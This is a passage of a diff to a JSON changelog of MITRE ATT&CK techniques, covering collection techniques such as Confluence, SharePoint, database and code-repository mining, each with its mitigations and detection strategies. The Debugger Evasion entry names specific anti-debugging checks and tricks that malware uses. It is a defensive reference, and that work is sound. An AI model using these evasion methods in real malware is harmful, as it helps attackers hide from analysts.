+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:37.187000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1032: Multi-factor Authentication",
+                            "M1037: Filter Network Traffic",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0484: Multi-Platform Cloud Storage Exfiltration Behavior Chain"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-20 00:08:21.745000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Network Device Configuration Dump",
+                    "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1602/002",
+                            "external_id": "T1602.002"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018",
+                            "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-068A 2018",
+                            "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:47.219000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1051: Update Software",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0233: Detection Strategy for Network Device Configuration Dump via Config Repositories"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-05-11 18:51:16.343000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Code Repositories",
+                    "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)\n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1213/003",
+                            "external_id": "T1213.003"
+                        },
+                        {
+                            "source_name": "Wired Uber Breach",
+                            "description": "Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.",
+                            "url": "https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/"
+                        },
+                        {
+                            "source_name": "Krebs Adobe",
+                            "description": "Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.",
+                            "url": "https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Itamar Mizrahi, Cymptom",
+                        "Toby Kohlenberg",
+                        "Josh Liburdi, @jshlbrd"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:25.081000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1032: Multi-factor Authentication",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0263: Detecting Bulk or Anomalous Access to Private Code Repositories via SaaS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-14 13:09:51.004000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Confluence",
+                    "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1213/001",
+                            "external_id": "T1213.001"
+                        },
+                        {
+                            "source_name": "Atlassian Confluence Logging",
+                            "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.",
+                            "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2025-10-24 17:48:59.776000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0358: Programmatic and Excessive Access to Confluence Documentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--248d3fe1-7fe1-4d71-91c7-8bb7ef35cad3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-05-22 19:02:46.718000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Databases",
+                    "description": "Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). \n\nExamples of databases from which information may be collected include MySQL, PostgreSQL, MongoDB, Amazon Relational Database Service, Azure SQL Database, Google Firebase, and Snowflake. Databases may include a variety of information of interest to adversaries, such as usernames, hashed passwords, personally identifiable information, and financial data. Data collected from databases may be used for [Lateral Movement](https://attack.mitre.org/tactics/TA0008), [Command and Control](https://attack.mitre.org/tactics/TA0011), or [Exfiltration](https://attack.mitre.org/tactics/TA0010). Data exfiltrated from databases may also be used to extort victims or may be sold for profit.(Citation: Google Cloud Threat Intelligence UNC5537 Snowflake 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1213/006",
+                            "external_id": "T1213.006"
+                        },
+                        {
+                            "source_name": "Google Cloud Threat Intelligence UNC5537 Snowflake 2024",
+                            "description": "Mandiant. (2024, June 10). UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion. Retrieved May 22, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-21 23:54:04.429000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1047: Audit",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0242: Suspicious Database Access and Dump Activity Across Environments (T1213.006)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-08-30 13:50:42.023000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Messaging Applications",
+                    "description": "Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.  \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: \n\n* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008)) \n* Source code snippets \n* Links to network shares and other internal resources \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1213/005",
+                            "external_id": "T1213.005"
+                        },
+                        {
+                            "source_name": "Sentinel Labs NullBulge 2024",
+                            "description": " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024.",
+                            "url": "https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/"
+                        },
+                        {
+                            "source_name": "Permiso Scattered Spider 2023",
+                            "description": "Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.",
+                            "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud"
+                        },
+                        {
+                            "source_name": "SC Magazine Ragnar Locker 2021",
+                            "description": "Joe Uchill. (2021, December 3). Ragnar Locker reminds breach victims it can read the on-network incident response chat rooms. Retrieved August 30, 2024.",
+                            "url": "https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms"
+                        },
+                        {
+                            "source_name": "Guardian Grand Theft Auto Leak 2022",
+                            "description": "Keza MacDonald, Keith Stuart and Alex Hern. (2022, September 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?. Retrieved August 30, 2024.",
+                            "url": "https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen"
+                        },
+                        {
+                            "source_name": "Microsoft DEV-0537",
+                            "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein",
+                        "Obsidian Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-04-15 22:48:58.763000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1047: Audit",
+                            "M1060: Out-of-Band Communications Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0567: Detecting Unauthorized Collection from Messaging Applications in SaaS and Office Environments"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-14 13:35:32.938000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Sharepoint",
+                    "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1213/002",
+                            "external_id": "T1213.002"
+                        },
+                        {
+                            "source_name": "Microsoft SharePoint Logging",
+                            "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.",
+                            "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:22.832000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0500: Detecting Abnormal SharePoint Data Mining by Privileged or Rare Users"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:20.537000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Data from Local System",
+                    "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1005",
+                            "external_id": "T1005"
+                        },
+                        {
+                            "source_name": "show_run_config_cmd_cisco",
+                            "description": "Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733"
+                        },
+                        {
+                            "source_name": "Mandiant APT41 Global Intrusion ",
+                            "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.",
+                            "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "William Cain",
+                        "Austin Clark, @c2defense",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:40.839000+00:00\"}}}",
+                    "previous_version": "1.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1057: Data Loss Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0380: Detection of Local Data Collection Prior to Exfiltration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 17:59:46.156000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Debugger Evasion",
+                    "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary. On Windows, this may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools.(Citation: Cado Security P2PInfect 2023)(Citation: Positive Technologies Hellhounds 2023) Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would \u201cswallow\u201d or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nMalware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program\u2019s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program\u2019s execution to continue.(Citation: Apriorit)\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1622",
+                            "external_id": "T1622"
+                        },
+                        {
+                            "source_name": "Apriorit",
+                            "description": "Apriorit. (2024, June 4). Anti Debugging Protection Techniques with Examples. Retrieved March 4, 2025.",
+                            "url": "https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software"
+                        },
+                        {
+                            "source_name": "Checkpoint Dridex Jan 2021",
+                            "description": "Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.",
+                            "url": "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/"
+                        },
+                        {
+                            "source_name": "hasherezade debug",
+                            "description": "hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.",
+                            "url": "https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf"
+                        },
+                        {
+                            "source_name": "Cado Security P2PInfect 2023",
+                            "description": "jbowen. (2023, December 4). P2Pinfect - New Variant Targets MIPS Devices. Retrieved March 18, 2025.",
+                            "url": "https://www.cadosecurity.com/blog/p2pinfect-new-variant-targets-mips-devices"
+                        },
+                        {
+                            "source_name": "AlKhaser Debug",
+                            "description": "Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.",
+                            "url": "https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug"
+                        },
+                        {
+                            "source_name": "wardle evilquest partii",
+                            "description": "Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.",
+                            "url": "https://objective-see.com/blog/blog_0x60.html"
+                        },
+                        {
+                            "source_name": "ProcessHacker Github",
+                            "description": "ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.",
+                            "url": "https://github.com/processhacker/processhacker"
+                        },
+                        {
+                            "source_name": "Positive Technologies Hellhounds 2023",
+                            "description": "PT Expert Security Center. (2023, November 29). Hellhounds: operation Lahat. Retrieved March 18, 2025.",
